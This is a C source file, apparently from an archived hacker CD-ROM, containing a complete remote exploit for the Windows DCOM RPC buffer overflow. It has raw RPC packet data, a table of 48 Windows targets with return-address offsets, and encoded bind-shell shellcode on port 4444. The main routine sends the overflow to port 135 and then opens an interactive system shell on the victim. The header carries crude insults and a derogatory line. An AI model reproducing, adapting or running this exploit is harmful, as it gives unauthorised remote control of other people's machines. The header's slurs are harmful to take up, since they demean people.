home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 14 / hacker14.iso / exploits / dcomscan / dcom_scan.c
Encoding:
C/C++ Source or Header  |  2003-08-19  |  16.0 KB  |  446 lines
  1. /*
  2.   DCOM RPC Overflow Discovered by LSD
  3.    -> http://www.lsd-pl.net/files/get?WINDOWS/win32_dcom
  4.    
  5.   Based on FlashSky/Benjurry's Code
  6.    -> http://www.xfocus.org/documents/200307/2.html
  7.    
  8.   Written by H D Moore <hdm [at] metasploit.com>
  9.    -> http://www.metasploit.com/
  10.   
  11.   Based on K-Otik Security's Code
  12.    -> http://www.k-otik.com
  13.  
  14.   Added Offsets from K-Otiks code (nuttso) 
  15.    -> nuttso@EFnet
  16.     
  17.   - Usage: ./dcom <Target ID> <Target IP>
  18.   - Targets:
  19.   -          enough still..
  20.  
  21.  
  22.   - ./HACK doesnt make you elite, nice try kids
  23.  
  24.  
  25.    shoutouts: aXe, skz, dizee, dennis, xen, stratx
  26.  
  27.    OSS IS TEH GAY
  28.  
  29. */
  30.  
  31. #include <stdio.h>
  32. #include <stdlib.h>
  33. #include <error.h>
  34. #include <sys/types.h>
  35. #include <sys/socket.h>
  36. #include <netinet/in.h>
  37. #include <arpa/inet.h>
  38. #include <unistd.h>
  39. #include <netdb.h>
  40. #include <fcntl.h>
  41. #include <unistd.h>
  42.  
  43. unsigned char bindstr[]={
  44. 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
  45. 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
  46. 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
  47. 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
  48. 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
  49.  
  50. unsigned char request1[]={
  51. 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
  52. ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
  53. ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
  54. ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
  55. ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
  56. ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
  57. ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
  58. ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
  59. ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
  60. ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
  61. ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
  62. ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
  63. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
  64. ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
  65. ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  66. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
  67. ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
  68. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
  69. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
  70. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
  71. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
  72. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
  73. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
  74. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
  75. ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
  76. ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
  77. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
  78. ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  79. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  80. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  81. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  82. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
  83. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
  84. ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
  85. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
  86. ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
  87. ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
  88. ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
  89. ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  90. ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
  91. ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
  92. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
  93. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
  94. ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
  95. ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
  96. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  97. ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
  98. ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
  99. ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  100. ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
  101. ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
  102. ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  103. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
  104. ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
  105. ,0x00,0x00,0x00,0x00,0x00,0x00};
  106.  
  107. unsigned char request2[]={
  108. 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
  109. ,0x00,0x00,0x5C,0x00,0x5C,0x00};
  110.  
  111. unsigned char request3[]={
  112. 0x5C,0x00
  113. ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
  114. ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
  115. ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
  116. ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
  117.  
  118.  
  119.  
  120. unsigned char *targets [] =
  121.         {
  122.     "winNT sp4 (english)",
  123.     "WinNT sp5 (china)",
  124.     "WinNT sp6 (china)",
  125.     "WinNT sp6a (china)",
  126.     "Win2k nosp ver 5.00.2195 (polish)",
  127.     "Win2k sp3 - ver 5.00.2195 tested (polish)",
  128.     "win2k sp4 (spanish)",
  129.     "Win2k nosp 1 (english)",
  130.     "Win2k nosp 2 (english)",
  131.     "Win2k sp1 (english)",
  132.     "Win2k sp2 1 (english)",
  133.     "Win2k sp2 2 (english)",
  134.     "Win2k sp3 1 (english)",
  135.     "Win2k sp3 2 (english)",
  136.     "win2k sp4 (english)",
  137.     "win2k nosp (china)",
  138.     "Win2k sp1 (china)",
  139.     "Win2k sp2 (china)",
  140.     "Win2k sp3 (china)",
  141.     "Win2k sp4 (china)",
  142.     "Win2k sp3 (german)",
  143.     "Win2k nosp (japan)",
  144.     "Win2k sp1 (japan)",
  145.     "Win2k sp2 (japan)",
  146.     "Win2k nosp (Korea)",
  147.     "Win2k sp1 (Korea/same as jp)",
  148.     "Win2k sp2 (Korea)",
  149.     "Win2k nosp (Mexico)",
  150.     "Win2k sp1 (Mexico)",
  151.     "Win2k sp1 (Kenya)",
  152.     "Win2k sp1 (Kenya)",
  153.     "Win2k sp1 (Kenya)",
  154.     "WinXP nosp ver 5.1.2600 (english)",
  155.     "WinXP sp1 1 (english)",
  156.     "WinXP sp1 2 (english)",
  157.     "WinXP sp2 (english)",
  158.     "Win2k3 (english)",
  159.     "Win2k sp3 (German)",
  160.     "Win2k sp4 1 (German)",
  161.     "Win2k sp4 2 (German)",
  162.     "WinXP sp1 (German)",
  163.     "Win2k Server SP1 (french)",
  164.     "Win2k Server SP4 (french)",
  165.     "WinXP no sp (french)",
  166.     "WinXP sp1 (french)",
  167.     "Win2k sp3 big (english?)",
  168.     "Win2k sp4 big (english?)",
  169.     "WinXP sp01 big (english?)",
  170.     NULL                                                                                       
  171.         };
  172.         
  173. unsigned long offsets [] = 
  174.         {
  175.     0x77f327e5,
  176.     0x77eedacf,
  177.     0x77f00eac,
  178.     0x77f0eac3,
  179.     0x77e33f4d,
  180.     0x77e42c29,
  181.     0x77a53b13,
  182.     0x77e81674,
  183.     0x77e33f6d,
  184.     0x77e829ec,
  185.     0x77e2492b,
  186.     0x77e824b5,
  187.     0x77e8367a,
  188.     0x772efa5c,
  189.     0x77f92a9b,
  190.     0x77e2e32a,
  191.     0x77e6898b,
  192.     0x77e0492b,
  193.     0x41424344,
  194.     0x77df4c29,
  195.     0x772e887a,
  196.     0x77f327e5,
  197.     0x77e5898b,
  198.     0x77df492b,
  199.     0x77e1e32a,
  200.     0x77e5898b,
  201.     0x77df492b,
  202.     0x77e1e32a,
  203.     0x77e8898b,
  204.     0x77e33f4d,
  205.     0x77e8898b,
  206.     0x77e2492b,
  207.     0x77e9afe3,
  208.     0x77e626ba,
  209.     0x77d737db,
  210.     0x777d73bd,
  211.     0x772254b0,
  212.     0x77e32c29,
  213.     0x77e04c29,
  214.     0x77e2c256,
  215.     0x77d418fc,
  216.     0x77e43e4b,
  217.     0x77e2c256,
  218.     0x77d4754a,
  219.     0x77d418fc,
  220.     0x77aa2b25,
  221.     0x77df4c29,
  222.     0x71a17bfb,
  223.         };
  224.  
  225. unsigned char sc[]=
  226.     "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
  227.     "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
  228.     "\x46\x00\x58\x00\x46\x00\x58\x00"
  229.  
  230.     "\xff\xff\xff\xff" /* return address */
  231.     
  232.     "\xcc\xe0\xfd\x7f" /* primary thread data block */
  233.     "\xcc\xe0\xfd\x7f" /* primary thread data block */
  234.  
  235.     /* port 4444 bindshell */
  236.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  237.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  238.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  239.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  240.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  241.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  242.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  243.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  244.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  245.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  246.     "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
  247.     "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
  248.     "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
  249.     "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
  250.     "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
  251.     "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
  252.     "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
  253.     "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"
  254.     "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
  255.     "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
  256.     "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
  257.     "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
  258.     "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
  259.     "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
  260.     "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
  261.     "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
  262.     "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
  263.     "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
  264.     "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
  265.     "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
  266.     "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
  267.     "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
  268.     "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
  269.     "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
  270.     "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
  271.     "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
  272.     "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
  273.     "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
  274.     "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
  275.     "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
  276.     "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
  277.     "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
  278.  
  279.    
  280.  
  281. unsigned char request4[]={
  282. 0x01,0x10
  283. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
  284. ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
  285. ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  286. };
  287.  
  288.  
  289. /* ripped from TESO code */
  290. void shell (int sock)
  291. {
  292.         int     l;
  293.         char    buf[512];
  294.         fd_set  rfds;
  295.  
  296.  
  297.         while (1) {
  298.                 FD_SET (0, &rfds);
  299.                 FD_SET (sock, &rfds);
  300.  
  301.                 select (sock + 1, &rfds, NULL, NULL, NULL);
  302.                 if (FD_ISSET (0, &rfds)) {
  303.                         l = read (0, buf, sizeof (buf));
  304.                         if (l <= 0) {
  305.                                 printf("\n - Connection closed by local user\n");
  306.                                 exit (EXIT_FAILURE);
  307.                         }
  308.                         write (sock, buf, l);
  309.                 }
  310.  
  311.                 if (FD_ISSET (sock, &rfds)) {
  312.                         l = read (sock, buf, sizeof (buf));
  313.                         if (l == 0) {
  314.                                 printf ("\n - Connection closed by remote host.\n");
  315.                                 exit (EXIT_FAILURE);
  316.                         } else if (l < 0) {
  317.                                 printf ("\n - Read failure\n");
  318.                                 exit (EXIT_FAILURE);
  319.                         }
  320.                         write (1, buf, l);
  321.                 }
  322.         }
  323. }
  324.  
  325.  
  326. int main(int argc, char **argv)
  327. {
  328.     
  329.     int sock;
  330.     int len,len1;
  331.     unsigned int target_id;
  332.     unsigned long ret;
  333.     struct sockaddr_in target_ip;
  334.     unsigned short port = 135;
  335.     unsigned char buf1[0x1000];
  336.     unsigned char buf2[0x1000];
  337.  
  338.     printf("---------------------------------------------------------\n");
  339.     printf("- Remote DCOM RPC Buffer Overflow Exploit\n");
  340.     printf("- Original code by FlashSky and Benjurry\n");
  341.     printf("- Rewritten by HDM <hdm [at] metasploit.com>\n");
  342.     printf("- 48 targets by nuttso <sendpackets [at] hotmail.com>\n");
  343.  
  344.  
  345.     if(argc<3)
  346.     {
  347.         printf("- Usage: %s <Target ID> <Target IP>\n", argv[0]);
  348.         printf("- Targets:\n");
  349.         for (len=0; targets[len] != NULL; len++)
  350.         {
  351.             printf("-          %d\t%s\n", len, targets[len]);   
  352.         }
  353.         printf("\n");
  354.         exit(1);
  355.     }
  356.  
  357.     /* yeah, get over it :) */
  358.     target_id = atoi(argv[1]);
  359.     ret = offsets[target_id];
  360.     
  361.     printf("- Using return address of 0x%.8x\n", ret);
  362.  
  363.     memcpy(sc+36, (unsigned char *) &ret, 4);
  364.  
  365.     target_ip.sin_family = AF_INET;
  366.     target_ip.sin_addr.s_addr = inet_addr(argv[2]);
  367.     target_ip.sin_port = htons(port);
  368.  
  369.     if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
  370.     {
  371.         perror("- Socket");
  372.         return(0);
  373.     }
  374.     
  375.     if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
  376.     {
  377.         perror("- Connect");
  378.         return(0);
  379.     }
  380.     
  381.     len=sizeof(sc);
  382.     memcpy(buf2,request1,sizeof(request1));
  383.     len1=sizeof(request1);
  384.     
  385.     *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;  
  386.     *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
  387.     
  388.     memcpy(buf2+len1,request2,sizeof(request2));
  389.     len1=len1+sizeof(request2);
  390.     memcpy(buf2+len1,sc,sizeof(sc));
  391.     len1=len1+sizeof(sc);
  392.     memcpy(buf2+len1,request3,sizeof(request3));
  393.     len1=len1+sizeof(request3);
  394.     memcpy(buf2+len1,request4,sizeof(request4));
  395.     len1=len1+sizeof(request4);
  396.     
  397.     *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
  398.     
  399.  
  400.     *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;  
  401.     *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
  402.     *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
  403.     *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
  404.     *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
  405.     *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
  406.     *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
  407.     
  408.     if (send(sock,bindstr,sizeof(bindstr),0)== -1)
  409.     {
  410.             perror("- Send");
  411.             return(0);
  412.     }
  413.     len=recv(sock, buf1, 1000, 0);
  414.     
  415.     if (send(sock,buf2,len1,0)== -1)
  416.     {
  417.             perror("- Send");
  418.             return(0);
  419.     }
  420.     close(sock);
  421.     sleep(1);
  422.     
  423.     target_ip.sin_family = AF_INET;
  424.     target_ip.sin_addr.s_addr = inet_addr(argv[2]);
  425.     target_ip.sin_port = htons(4444);
  426.  
  427.     if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
  428.     {
  429.         perror("- Socket");
  430.         return(0);
  431.     }
  432.     
  433.     if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
  434.     {
  435.         printf("- Exploit appeared to have failed.\n");
  436.         return(0);
  437.     }   
  438.     
  439.     printf("- Dropping to System Shell...\n\n");
  440.  
  441.     shell(sock);
  442.     
  443.     return(0);
  444. }
  445.  
  446.